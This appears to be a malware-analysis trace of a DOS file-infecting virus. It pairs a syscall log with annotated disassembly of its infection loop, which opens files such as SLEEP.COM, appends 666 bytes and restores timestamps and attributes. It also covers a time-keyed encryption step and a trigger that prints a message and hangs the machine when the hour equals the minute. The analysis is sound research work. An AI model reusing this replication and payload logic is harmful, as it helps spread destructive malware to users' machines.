0x12d2c: pop ds                              ; restore DS
0x12d2d: mov dx, di
0x12d2f: add dx, 0x218                       ; DX = DI + 0x218, offset of the message text
0x12d33: mov ah, 9
0x12d35: int 0x21                            ; DOS function 09h: print the '$'-terminated string at DS:DX
0x12d37: cli                                 ; interrupts off ...
0x12d38: hlt                                 ; ... then halt: the machine stays hung until reset
; NOTE(review): control does not continue past cli/hlt, so the lines below are probably
; data decoded as instructions. The usual encodings of these mnemonics (48 65 6C 67 61)
; would read "Helga" as ASCII; confirm against the raw bytes.
0x12d39: dec ax
0x12d3a: insb byte ptr es:[di], dx
0x12d3c: popaw
0x12d3e: add word ptr [bx], di
2018-12-25T12:54:38.64312077Z 9 PC: 12d37 | Display string (String= ' �� ����� ������� ����? �������-�������? �� ����� ������� ����? �������� ��� �� ����!')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":17008,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:38.14357498Z 26 PC: 12b04 | Set disk transfer address
2018-12-25T12:54:38.145102376Z 78 PC: 12b17 | Find first file
2018-12-25T12:54:38.150872416Z 47 PC: 12b1d | Get disk transfer address
2018-12-25T12:54:38.151730456Z 67 PC: 12ca3 | Get or set file attributes
2018-12-25T12:54:38.156029651Z 67 PC: 12cab | Get or set file attributes
2018-12-25T12:54:38.767153896Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:38.774186324Z 87 PC: 12cb8 | Get or set file date and time
2018-12-25T12:54:38.776428426Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:38.783622299Z 66 PC: 12b79 | Move file pointer
2018-12-25T12:54:38.785450865Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
; Disassembly window around the DOS "Get time" call traced at PC 12ace; the first
; instruction of the window (xor cx, dx) is on the log line above.
; Get time returns CH/CL = hour/minute and DH/DL = second/hundredths, so the two XORs
; fold the current time into a single byte in CH.
0x12ad0: xor ch, cl                          ; CH = time-derived byte
0x12ad2: mov byte ptr [di + 0x10], ch        ; stored at [di+0x10]; presumably a per-copy key for the routine called next, confirm there
0x12ad5: call 0x22aae                        ; NOTE(review): target not in this window; for a 16-bit near call the printed address likely wraps to 0x12aae, confirm
0x12ad8: pop bx
0x12ad9: popaw                               ; restore general registers (the matching pushaw is outside this window)
0x12ada: mov ah, byte ptr [di + 9]           ; DOS function number is read from data, not an immediate; the log records function 64 (write) here
0x12add: mov cx, 0x29a                       ; length = 0x29a = 666 bytes, matching the logged write size
0x12ae0: nop
0x12ae1: mov dx, di                          ; buffer = DS:DI
0x12ae3: int 0x21                            ; logged as "Write file or device" at PC 12ae5
0x12ae5: pushaw
0x12ae6: call 0x22aae                        ; same routine again after the write; presumably reverses the transform applied before it (TODO confirm)
0x12ae9: pop bx                              ; stack balance here depends on the called routine, which is not shown
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di                         ; code past the ret belongs to another routine whose entry is not shown
0x12aee: pop si                              ; NOTE(review): pop si / sub si, 6 / push si looks like a run-time base-address
0x12aef: sub si, 6                           ;   computation from a return address, confirm against the caller
0x12af2: push si
2018-12-25T12:54:38.788289152Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:54:38.967771115Z 66 PC: 12b97 | Move file pointer
2018-12-25T12:54:38.969139902Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:38.975684639Z 87 PC: 12bc0 | Get or set file date and time
2018-12-25T12:54:38.977264222Z 62 PC: 12bc6 | Close file
2018-12-25T12:54:38.985093427Z 67 PC: 12bcd | Get or set file attributes
2018-12-25T12:54:38.995632491Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.999025796Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.000012669Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.005489552Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.015909279Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.022258779Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.02356763Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.030606043Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:39.032479007Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:39.034931334Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:39.043338874Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:39.044654345Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:39.050851017Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.052138149Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.060125163Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.069565556Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.07207077Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.073563372Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.079234404Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.088969496Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.096319472Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.097588495Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.103759186Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:39.10552064Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:39.107765888Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:39.115703084Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:39.117891968Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:39.12413065Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.125436876Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.13334038Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.142844953Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.145505752Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.147227133Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.152637295Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.161980608Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.17390319Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.175504633Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.182354722Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:39.184687331Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:39.18716605Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:39.195301793Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:39.197425199Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:39.204011311Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.205274502Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.218270465Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.227779967Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.230128931Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.231547166Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.236838604Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.246498323Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.253198879Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.25438371Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.260224075Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:39.262142817Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:39.264330036Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:39.272212404Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:39.27366775Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:39.279867274Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.281132345Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.288923271Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.298256185Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.300663865Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.302282146Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.308187624Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.317470644Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.324004238Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.325787667Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.332143001Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:39.333884443Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:39.337242173Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:39.346129957Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:39.347288312Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:39.353991729Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.355717747Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.363388831Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.373367621Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.375823593Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.376746493Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.382243151Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.39107071Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.3951744Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.396238151Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.400071133Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:39.400946411Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:39.402685264Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:39.407762636Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:39.408697913Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:39.413130443Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.414590967Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.421577182Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.42926695Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.430903632Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.431645286Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.438208715Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.447690548Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.453958533Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.458793975Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.464833337Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.4661334Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.473303945Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.48307327Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.485526817Z 78 PC: 12c66 | Find first file
2018-12-25T12:54:39.495765067Z 78 PC: 12c66 | Find first file (See above)
2018-12-25T12:54:39.50635893Z 78 PC: 12bf7 | Find first file
2018-12-25T12:54:39.511718877Z 44 PC: 12d19 | Get time 0x12d19: cmp ch, cl
; Disassembly window around the DOS "Get time" call (int 21h, function 2Ch) traced at PC 12d19.
; Get time returns CH = hour and CL = minute; the compare on the log line above (cmp ch, cl)
; therefore selects the moment when the hour value equals the minute value.
; In this run the next logged call is "Set disk transfer address" at PC 12b36, not
; "Display string", so the ret path below was presumably taken.
0x12d1b: je 0x12d1e                          ; CH == CL: fall into the routine at 0x12d1e
0x12d1d: ret                                 ; otherwise return, nothing else happens here
0x12d1e: push ds                             ; save DS before pointing it at low memory
0x12d1f: xor ax, ax
0x12d21: mov ds, ax                          ; DS = 0
0x12d23: mov byte ptr [0x417], 0x70          ; 0000:0417 = BIOS keyboard flag byte; 0x70 marks Scroll/Num/Caps Lock active
0x12d28: mov ah, 1
0x12d2a: int 0x16                            ; BIOS keyboard service 01h (keystroke status); its result is not used in the visible code
0x12d2c: pop ds                              ; restore DS
0x12d2d: mov dx, di
0x12d2f: add dx, 0x218                       ; DX = DI + 0x218, offset of the message text
0x12d33: mov ah, 9
0x12d35: int 0x21                            ; DOS function 09h: print the '$'-terminated string at DS:DX
0x12d37: cli                                 ; interrupts off ...
0x12d38: hlt                                 ; ... then halt: the machine stays hung until reset
; NOTE(review): control does not continue past cli/hlt, so the lines below are probably
; data decoded as instructions. The usual encodings of these mnemonics (48 65 6C 67 61)
; would read "Helga" as ASCII; confirm against the raw bytes.
0x12d39: dec ax
0x12d3a: insb byte ptr es:[di], dx
0x12d3c: popaw
0x12d3e: add word ptr [bx], di
2018-12-25T12:54:39.513821614Z 26 PC: 12b36 | Set disk transfer address